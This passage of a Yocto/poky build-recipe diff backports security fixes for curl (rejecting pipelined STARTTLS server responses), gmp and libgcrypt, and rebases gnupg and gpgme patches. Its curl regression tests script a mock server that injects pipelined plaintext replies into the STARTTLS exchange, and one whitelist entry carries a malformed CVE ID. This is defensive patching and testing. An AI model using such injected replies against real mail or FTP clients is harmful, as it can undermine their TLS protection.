supported."); ++ result = CURLE_USE_SSL_FAILED; ++ } + } + + return result; +diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc +index f9535a6..0fa6799 100644 +--- a/tests/data/Makefile.inc ++++ b/tests/data/Makefile.inc +@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \ + test954 test955 test956 test957 test958 test959 test960 test961 test962 \ + test963 test964 test965 test966 test967 test968 test969 \ + \ ++test984 test985 test986 \ ++\ + test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \ + test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \ + test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \ +diff --git a/tests/data/test984 b/tests/data/test984 +new file mode 100644 +index 0000000..e573f23 +--- /dev/null ++++ b/tests/data/test984 +@@ -0,0 +1,56 @@ ++<testcase> ++<info> ++<keywords> ++IMAP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++REPLY CAPABILITY A001 BAD Not implemented ++</servercmd> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++imap ++</server> ++ <name> ++IMAP require STARTTLS with failing capabilities ++ </name> ++ <command> ++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd ++</command> ++<file name="log/upload%TESTNUMBER"> ++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST) ++From: Fred Foobar <foobar@example.COM> ++Subject: afternoon meeting ++To: joe@example.com ++Message-Id: <B27397-0100000@example.COM> ++MIME-Version: 1.0 ++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII ++ ++Hello Joe, do you think we can meet at 3:30 tomorrow? ++</file> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 64 is CURLE_USE_SSL_FAILED ++<errorcode> ++64 ++</errorcode> ++<protocol> ++A001 CAPABILITY ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test985 b/tests/data/test985 +new file mode 100644 +index 0000000..d0db4aa +--- /dev/null ++++ b/tests/data/test985 +@@ -0,0 +1,54 @@ ++<testcase> ++<info> ++<keywords> ++POP3 ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++REPLY CAPA -ERR Not implemented ++</servercmd> ++<data nocheck="yes"> ++From: me@somewhere ++To: fake@nowhere ++ ++body ++ ++-- ++ yours sincerely ++</data> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++pop3 ++</server> ++ <name> ++POP3 require STARTTLS with failing capabilities ++ </name> ++ <command> ++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd ++ </command> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 64 is CURLE_USE_SSL_FAILED ++<errorcode> ++64 ++</errorcode> ++<protocol> ++CAPA ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test986 b/tests/data/test986 +new file mode 100644 +index 0000000..a709437 +--- /dev/null ++++ b/tests/data/test986 +@@ -0,0 +1,53 @@ ++<testcase> ++<info> ++<keywords> ++FTP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++REPLY welcome 230 Welcome ++REPLY AUTH 500 unknown command ++</servercmd> ++</reply> ++ ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++ftp ++</server> ++ <name> ++FTP require STARTTLS while preauthenticated ++ </name> ++<file name="log/test%TESTNUMBER.txt"> ++data ++ to ++ see ++that FTPS ++works ++ so does it? ++</file> ++ <command> ++--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret ++</command> ++</client> ++ ++# Verify data after the test has been "shot" ++<verify> ++# 64 is CURLE_USE_SSL_FAILED ++<errorcode> ++64 ++</errorcode> ++<protocol> ++AUTH SSL ++AUTH TLS ++</protocol> ++</verify> ++</testcase> diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch new file mode 100644 index 0000000000..070a328e27 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch @@ -0,0 +1,352 @@ +Backport of: + +From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001 +From: Patrick Monnerat <patrick@monnerat.net> +Date: Tue, 7 Sep 2021 13:26:42 +0200 +Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response + pipelining + +If a server pipelines future responses within the STARTTLS response, the +former are preserved in the pingpong cache across TLS negotiation and +used as responses to the encrypted commands. + +This fix detects pipelined STARTTLS responses and rejects them with an +error. + +Bug: https://curl.se/docs/CVE-2021-22947.html +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe <mac@mcrowe.com> +CVE: CVE-2021-22947 + +--- + lib/ftp.c | 3 +++ + lib/imap.c | 4 +++ + lib/pop3.c | 4 +++ + lib/smtp.c | 4 +++ + tests/data/Makefile.inc | 2 ++ + tests/data/test980 | 52 ++++++++++++++++++++++++++++++++++++ + tests/data/test981 | 59 +++++++++++++++++++++++++++++++++++++++++ + tests/data/test982 | 57 +++++++++++++++++++++++++++++++++++++++ + tests/data/test983 | 52 ++++++++++++++++++++++++++++++++++++ + 9 files changed, 237 insertions(+) + create mode 100644 tests/data/test980 + create mode 100644 tests/data/test981 + create mode 100644 tests/data/test982 + create mode 100644 tests/data/test983 + +diff --git a/lib/ftp.c b/lib/ftp.c +index 91b43d8..31a34e8 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + case FTP_AUTH: + /* we have gotten the response to a previous AUTH command */ + ++ if(pp->cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. */ ++ + /* RFC2228 (page 5) says: + * + * If the server is willing to accept the named security mechanism, +diff --git a/lib/imap.c b/lib/imap.c +index 9880ce1..0ca700f 100644 +--- a/lib/imap.c ++++ b/lib/imap.c +@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. */ ++ if(data->conn->proto.imapc.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(imapcode != IMAP_RESP_OK) { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied"); +diff --git a/lib/pop3.c b/lib/pop3.c +index 145b2b4..8a2d52e 100644 +--- a/lib/pop3.c ++++ b/lib/pop3.c +@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. */ ++ if(data->conn->proto.pop3c.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(pop3code != '+') { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied"); +diff --git a/lib/smtp.c b/lib/smtp.c +index e187287..66183e2 100644 +--- a/lib/smtp.c ++++ b/lib/smtp.c +@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. */ ++ if(data->conn->proto.smtpc.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(smtpcode != 220) { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied, code %d", smtpcode); +diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc +index 0fa6799..60e8176 100644 +--- a/tests/data/Makefile.inc ++++ b/tests/data/Makefile.inc +@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \ + test954 test955 test956 test957 test958 test959 test960 test961 test962 \ + test963 test964 test965 test966 test967 test968 test969 \ + \ ++test980 test981 test982 test983 \ ++\ + test984 test985 test986 \ + \ + test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \ +diff --git a/tests/data/test980 b/tests/data/test980 +new file mode 100644 +index 0000000..97567f8 +--- /dev/null ++++ b/tests/data/test980 +@@ -0,0 +1,52 @@ ++<testcase> ++<info> ++<keywords> ++SMTP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++CAPA STARTTLS ++AUTH PLAIN ++REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted ++REPLY AUTH 535 5.7.8 Authentication credentials invalid ++</servercmd> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++smtp ++</server> ++ <name> ++SMTP STARTTLS pipelined server response ++ </name> ++<stdin> ++mail body ++</stdin> ++ <command> ++smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T - ++</command> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 8 is CURLE_WEIRD_SERVER_REPLY ++<errorcode> ++8 ++</errorcode> ++<protocol> ++EHLO %TESTNUMBER ++STARTTLS ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test981 b/tests/data/test981 +new file mode 100644 +index 0000000..2b98ce4 +--- /dev/null ++++ b/tests/data/test981 +@@ -0,0 +1,59 @@ ++<testcase> ++<info> ++<keywords> ++IMAP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++CAPA STARTTLS ++REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted ++REPLY LOGIN A003 BAD Authentication credentials invalid ++</servercmd> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++imap ++</server> ++ <name> ++IMAP STARTTLS pipelined server response ++ </name> ++ <command> ++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl ++</command> ++<file name="log/upload%TESTNUMBER"> ++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST) ++From: Fred Foobar <foobar@example.COM> ++Subject: afternoon meeting ++To: joe@example.com ++Message-Id: <B27397-0100000@example.COM> ++MIME-Version: 1.0 ++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII ++ ++Hello Joe, do you think we can meet at 3:30 tomorrow? ++</file> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 8 is CURLE_WEIRD_SERVER_REPLY ++<errorcode> ++8 ++</errorcode> ++<protocol> ++A001 CAPABILITY ++A002 STARTTLS ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test982 b/tests/data/test982 +new file mode 100644 +index 0000000..9e07cc0 +--- /dev/null ++++ b/tests/data/test982 +@@ -0,0 +1,57 @@ ++<testcase> ++<info> ++<keywords> ++POP3 ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++CAPA STLS USER ++REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated ++REPLY PASS -ERR Authentication credentials invalid ++</servercmd> ++<data nocheck="yes"> ++From: me@somewhere ++To: fake@nowhere ++ ++body ++ ++-- ++ yours sincerely ++</data> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++pop3 ++</server> ++ <name> ++POP3 STARTTLS pipelined server response ++ </name> ++ <command> ++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl ++ </command> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 8 is CURLE_WEIRD_SERVER_REPLY ++<errorcode> ++8 ++</errorcode> ++<protocol> ++CAPA ++STLS ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test983 b/tests/data/test983 +new file mode 100644 +index 0000000..300ec45 +--- /dev/null ++++ b/tests/data/test983 +@@ -0,0 +1,52 @@ ++<testcase> ++<info> ++<keywords> ++FTP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++REPLY AUTH 500 unknown command\r\n500 unknown command\r\n331 give password\r\n230 Authenticated\r\n257 "/"\r\n200 OK\r\n200 OK\r\n200 OK\r\n226 Transfer complete ++REPLY PASS 530 Login incorrect ++</servercmd> ++</reply> ++ ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++ftp ++</server> ++ <name> ++FTP STARTTLS pipelined server response ++ </name> ++<file name="log/test%TESTNUMBER.txt"> ++data ++ to ++ see ++that FTPS ++works ++ so does it? ++</file> ++ <command> ++--ssl --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret -P %CLIENTIP ++</command> ++</client> ++ ++# Verify data after the test has been "shot" ++<verify> ++# 8 is CURLE_WEIRD_SERVER_REPLY ++<errorcode> ++8 ++</errorcode> ++<protocol> ++AUTH SSL ++</protocol> ++</verify> ++</testcase> diff --git a/poky/meta/recipes-support/curl/curl_7.69.1.bb b/poky/meta/recipes-support/curl/curl_7.69.1.bb index 21c673feda..bc1b993e9e 100644 --- a/poky/meta/recipes-support/curl/curl_7.69.1.bb +++ b/poky/meta/recipes-support/curl/curl_7.69.1.bb @@ -22,6 +22,9 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \ file://CVE-2021-22898.patch \ file://CVE-2021-22924.patch \ file://CVE-2021-22925.patch \ + file://CVE-2021-22946-pre1.patch \ + file://CVE-2021-22946.patch \ + file://CVE-2021-22947.patch \ " SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42" @@ -29,7 +32,12 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5 # Curl has used many names over the years... CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl" -CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926" +CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-22945" + +# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897 +# and https://ubuntu.com/security/CVE-2021-22897 +# This CVE issue affects Windows only Hence whitelisting this CVE +CVE_CHECK_WHITELIST += "CVE-2021-22897" inherit autotools pkgconfig binconfig multilib_header diff --git a/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb index 1623285fd0..ea34e4c7a3 100644 --- a/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb +++ b/poky/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb @@ -8,7 +8,7 @@ SECTION = "support" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32" -SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix" +SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))" SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197" diff --git a/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch new file mode 100644 index 0000000000..095fb21eaa --- /dev/null +++ b/poky/meta/recipes-support/gmp/gmp/cve-2021-43618.patch @@ -0,0 +1,27 @@ +CVE: CVE-2021-43618 +Upstream-Status: Backport +Signed-off-by: Ross Burton <ross.burton@arm.com> + +# HG changeset patch +# User Marco Bodrato <bodrato@mail.dm.unipi.it> +# Date 1634836009 -7200 +# Node ID 561a9c25298e17bb01896801ff353546c6923dbd +# Parent e1fd9db13b475209a864577237ea4b9105b3e96e +mpz/inp_raw.c: Avoid bit size overflows + +diff -r e1fd9db13b47 -r 561a9c25298e mpz/inp_raw.c +--- a/mpz/inp_raw.c Tue Dec 22 23:49:51 2020 +0100 ++++ b/mpz/inp_raw.c Thu Oct 21 19:06:49 2021 +0200 +@@ -88,8 +88,11 @@ + + abs_csize = ABS (csize); + ++ if (UNLIKELY (abs_csize > ~(mp_bitcnt_t) 0 / 8)) ++ return 0; /* Bit size overflows */ ++ + /* round up to a multiple of limbs */ +- abs_xsize = BITS_TO_LIMBS (abs_csize*8); ++ abs_xsize = BITS_TO_LIMBS ((mp_bitcnt_t) abs_csize * 8); + + if (abs_xsize != 0) + { diff --git a/poky/meta/recipes-support/gmp/gmp_6.2.0.bb b/poky/meta/recipes-support/gmp/gmp_6.2.0.bb index a19c74fca8..d29b74f829 100644 --- a/poky/meta/recipes-support/gmp/gmp_6.2.0.bb +++ b/poky/meta/recipes-support/gmp/gmp_6.2.0.bb @@ -12,6 +12,7 @@ SRC_URI = "https://gmplib.org/download/${BPN}/${BP}${REVISION}.tar.bz2 \ file://use-includedir.patch \ file://0001-Append-the-user-provided-flags-to-the-auto-detected-.patch \ file://0001-confiure.ac-Believe-the-cflags-from-environment.patch \ + file://cve-2021-43618.patch \ " SRC_URI[md5sum] = "c24161e0dd44cae78cd5f67193492a21" SRC_URI[sha256sum] = "f51c99cb114deb21a60075ffb494c1a210eb9d7cb729ed042ddb7de9534451ea" diff --git a/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb b/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb index e5c69c0c46..19f32e8d1f 100644 --- a/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb +++ b/poky/meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb @@ -9,7 +9,7 @@ LICENSE = "LGPLv2+" LIC_FILES_CHKSUM = "file://COPYING;md5=3bf50002aefd002f49e7bb854063f7e7 \ file://src/gnome-desktop-testing-runner.c;beginline=1;endline=20;md5=7ef3ad9da2ffcf7707dc11151fe007f4" -SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http" +SRC_URI = "git://gitlab.gnome.org/GNOME/gnome-desktop-testing.git;protocol=http;branch=master" SRCREV = "4decade67b29ad170fcf3de148e41695fc459f48" DEPENDS = "glib-2.0" diff --git a/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch b/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch index 2c204e0245..a0af2d48dc 100644 --- a/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch @@ -1,4 +1,4 @@ -From e7ad11cf54475e455fdb84d118e4782961698567 Mon Sep 17 00:00:00 2001 +From abc5c396aaddaef2e6811362e3e0cc0da28c2b34 Mon Sep 17 00:00:00 2001 From: Alexander Kanavin <alex.kanavin@gmail.com> Date: Mon, 22 Jan 2018 18:00:21 +0200 Subject: [PATCH] configure.ac: use a custom value for the location of @@ -14,10 +14,10 @@ Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac -index 919ab31..cd58fdb 100644 +index 64cb8c6..3fe9027 100644 --- a/configure.ac +++ b/configure.ac -@@ -1855,7 +1855,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf", +@@ -1824,7 +1824,7 @@ AC_DEFINE_UNQUOTED(GPGCONF_DISP_NAME, "GPGConf", AC_DEFINE_UNQUOTED(GPGTAR_NAME, "gpgtar", [The name of the gpgtar tool]) diff --git a/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch b/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch index 3e798efd06..a13b4d5fb5 100644 --- a/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch @@ -1,7 +1,7 @@ -From 9c3858ffda6246bf9e1e6aeeb920532a56b19408 Mon Sep 17 00:00:00 2001 +From 6c75656b68cb6e38b039ae532bd39437cd6daec5 Mon Sep 17 00:00:00 2001 From: Saul Wold <sgw@linux.intel.com> Date: Wed, 16 Aug 2017 11:18:01 +0800 -Subject: [PATCH 3/4] dirmngr uses libgpg error +Subject: [PATCH] dirmngr uses libgpg error Upstream-Status: Pending Signed-off-by: Saul Wold <sgw@linux.intel.com> @@ -9,24 +9,20 @@ Signed-off-by: Saul Wold <sgw@linux.intel.com> Rebase to 2.1.23 Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> + --- - dirmngr/Makefile.am | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) + dirmngr/Makefile.am | 1 + + 1 file changed, 1 insertion(+) diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am -index b404165..d3f916e 100644 +index 00d3c42..450d873 100644 --- a/dirmngr/Makefile.am +++ b/dirmngr/Makefile.am -@@ -82,7 +82,8 @@ endif - dirmngr_LDADD = $(libcommonpth) \ +@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \ $(DNSLIBS) $(LIBASSUAN_LIBS) \ $(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \ -- $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) -+ $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \ -+ $(GPG_ERROR_LIBS) + $(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \ ++ $(GPG_ERROR_LIBS) \ + $(dirmngr_robj) if USE_LDAP dirmngr_LDADD += $(ldaplibs) - endif --- -1.8.3.1 - diff --git a/poky/meta/recipes-support/gnupg/gnupg/relocate.patch b/poky/meta/recipes-support/gnupg/gnupg/relocate.patch index e5a82aa76d..7f7812cd46 100644 --- a/poky/meta/recipes-support/gnupg/gnupg/relocate.patch +++ b/poky/meta/recipes-support/gnupg/gnupg/relocate.patch @@ -1,4 +1,4 @@ -From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001 +From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001 From: Ross Burton <ross.burton@intel.com> Date: Wed, 19 Sep 2018 14:44:40 +0100 Subject: [PATCH] Allow the environment to override where gnupg looks for its @@ -12,10 +12,10 @@ Signed-off-by: Ross Burton <ross.burton@intel.com> 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/common/homedir.c b/common/homedir.c -index e9e75d0..19140aa 100644 +index 4b6e46e..58989b4 100644 --- a/common/homedir.c +++ b/common/homedir.c -@@ -760,7 +760,7 @@ gnupg_socketdir (void) +@@ -763,7 +763,7 @@ gnupg_socketdir (void) if (!name) { unsigned int dummy; @@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644 } return name; -@@ -786,7 +786,7 @@ gnupg_sysconfdir (void) +@@ -789,7 +789,7 @@ gnupg_sysconfdir (void) } return name; #else /*!HAVE_W32_SYSTEM*/ @@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -815,7 +815,7 @@ gnupg_bindir (void) +@@ -818,7 +818,7 @@ gnupg_bindir (void) else return rdir; #else /*!HAVE_W32_SYSTEM*/ @@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -828,7 +828,7 @@ gnupg_libexecdir (void) +@@ -831,7 +831,7 @@ gnupg_libexecdir (void) #ifdef HAVE_W32_SYSTEM return gnupg_bindir (); #else /*!HAVE_W32_SYSTEM*/ @@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -842,7 +842,7 @@ gnupg_libdir (void) +@@ -845,7 +845,7 @@ gnupg_libdir (void) name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL); return name; #else /*!HAVE_W32_SYSTEM*/ @@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -856,7 +856,7 @@ gnupg_datadir (void) +@@ -859,7 +859,7 @@ gnupg_datadir (void) name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL); return name; #else /*!HAVE_W32_SYSTEM*/ @@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -872,7 +872,7 @@ gnupg_localedir (void) +@@ -875,7 +875,7 @@ gnupg_localedir (void) NULL); return name; #else /*!HAVE_W32_SYSTEM*/ @@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644 #endif /*!HAVE_W32_SYSTEM*/ } -@@ -940,7 +940,7 @@ gnupg_cachedir (void) +@@ -943,7 +943,7 @@ gnupg_cachedir (void) } return dir; #else /*!HAVE_W32_SYSTEM*/ diff --git a/poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb index 6629fc8556..18bb855769 100644 --- a/poky/meta/recipes-support/gnupg/gnupg_2.2.20.bb +++ b/poky/meta/recipes-support/gnupg/gnupg_2.2.27.bb @@ -25,14 +25,14 @@ SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for- file://relocate.patch" SRC_URI_append_class-nativesdk = " file://relocate.patch" -SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1" -SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30" +SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399" EXTRA_OECONF = "--disable-ldap \ --disable-ccid-driver \ --with-zlib=${STAGING_LIBDIR}/.. \ --with-bzip2=${STAGING_LIBDIR}/.. \ --with-readline=${STAGING_LIBDIR}/.. \ + --with-mailprog=${sbindir}/sendmail \ --enable-gpg-is-gpg2 \ " diff --git a/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch b/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch new file mode 100644 index 0000000000..1c46684c6d --- /dev/null +++ b/poky/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch @@ -0,0 +1,24 @@ +From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001 +From: Khem Raj <raj.khem@gmail.com> +Date: Thu, 15 Jul 2021 12:33:13 -0700 +Subject: [PATCH] use closefrom() on linux and glibc 2.34+ + +Upstream-Status: Pending +Signed-off-by: Khem Raj <raj.khem@gmail.com> +--- + src/posix-io.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/posix-io.c b/src/posix-io.c +index e712ef2..ab8ded9 100644 +--- a/src/posix-io.c ++++ b/src/posix-io.c +@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags, + if (fd_list[i].fd > fd) + fd = fd_list[i].fd; + fd++; +-#if defined(__sun) || defined(__FreeBSD__) ++#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34)) + closefrom (fd); + max_fds = fd; + #else /*!__sun */ diff --git a/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb index 6e945d3165..dacc9896e4 100644 --- a/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb +++ b/poky/meta/recipes-support/gpgme/gpgme_1.13.1.bb @@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \ file://0006-fix-build-path-issue.patch \ file://0007-python-Add-variables-to-tests.patch \ file://0008-do-not-auto-check-var-PYTHON.patch \ - " + file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \ + " SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645" SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46" diff --git a/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch new file mode 100644 index 0000000000..bf26486d8b --- /dev/null +++ b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch @@ -0,0 +1,77 @@ +From e8b7f10be275bcedb5fc05ed4837a89bfd605c61 Mon Sep 17 00:00:00 2001 +From: NIIBE Yutaka <gniibe@fsij.org> +Date: Tue, 13 Apr 2021 10:00:00 +0900 +Subject: [PATCH] cipher: Hardening ElGamal by introducing exponent blinding + too. + +* cipher/elgamal.c (do_encrypt): Also do exponent blinding. + +-- + +Base blinding had been introduced with USE_BLINDING. This patch add +exponent blinding as well to mitigate side-channel attack on mpi_powm. + +GnuPG-bug-id: 5328 +Signed-off-by: NIIBE Yutaka <gniibe@fsij.org> + +Upstream-Status: Backport +CVE: CVE-2021-33560 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + 